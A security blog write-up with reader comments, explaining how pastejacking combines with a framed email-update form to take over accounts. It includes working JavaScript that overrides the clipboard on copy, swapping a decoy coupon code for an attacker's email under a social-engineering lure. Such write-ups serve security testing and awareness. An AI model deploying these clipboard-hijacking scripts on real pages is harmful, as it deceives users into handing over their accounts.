Sourav Sahana

@pocdork

Sourav Sahana Uncategorized Pastejacking to Account Takeover

Pastejacking to Account Takeover

Hello again ! Back with another write up. Hope you will enjoy this.

Summary:

Hope you all know about clickjacking issue. If you found a clickjacking issue in a website that will delete user account by one click this may consider as High risk issue. But what if there is a email update or password change form ? You can not trick an user to type a email address to update the account info with one click. So I use this trick when I am testing a web asset of an individual company.

What is Pastejacking:

It’s a powerful technique used to trick user to copy and use a text/string from a website but actually he is not copying the text rendered in the web page, there is something malicious text/command behind that text. JS code that does the mentioned task:

<script type="text/javascript">
        document.addEventListener('copy', function(e){
            console.log(e);
            e.clipboardData.setData('text/plain', 'HACKED');
            e.preventDefault();
        });
</script>

If this script is present on the page, whatever you copy from the page, your computer will copy the string “HACKED” which is hidden in the page.

How This Can Help Me in Account Takeover:

Then you have to a little task that is HTML and CSS coding. You have to only IFRAME update email form box and write some instruction on the page like this:

——————————————————————————————————————–

This was a POC I created when I was testing a web application. You can see that there is no profile/email update form. User will think that this is a coupon code generate platform and will follow the mentioned instructions. And if they are already logged in the target application his profile will be updated with a new email ID. JS code behind this POC page:

<script type="text/javascript">
        document.addEventListener('copy', function(e){
            console.log(e);
            e.clipboardData.setData('text/plain', '[email protected]');
            e.preventDefault();
        });
</script>

User will think that he is copying the string “5Aj3211GT10” but actually he is copying hacker’s email ID “[email protected]

.

.

.

Thanks for reading. Hope you enjoyed this trick…!

3 thoughts on “Pastejacking to Account Takeover”

  1. cybrog says:

    Superb man. But have little doubt at copying the no which is email id of attacker.

  2. R4JVE3R says:

    How can you specifically show the email update box from the whole iframe?

Leave a Reply to cybrog Cancel reply

Your email address will not be published. Required fields are marked *

TopBack to Top